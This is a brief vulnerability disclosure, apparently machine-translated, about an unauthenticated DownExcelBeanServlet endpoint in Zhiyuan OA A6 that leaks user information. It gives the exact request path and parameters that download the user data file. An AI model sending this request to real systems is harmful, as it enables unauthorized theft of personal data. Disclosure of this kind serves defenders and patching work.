Zhiyuan Oa A6 Downexcelbeanservlet User Sensitive Information Leak
Zhiyuan Oa A6 Downexcelbeanservlet User Sensitive Information Leak
Zhiyuan OA A6 DownExcelBeanServlet User sensitive information leak
Vulnerability Description
Zhiyuan OA A6 There is an unauthorized interface that causes any visitor to download user information in the OA.
Vulnerability Impact
Zhiyuan OA A6
Network surveying and mapping
Vulnerability reappears
Visit the following URL to jump to download user information files
/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
This post is licensed under CC BY 4.0 by the author.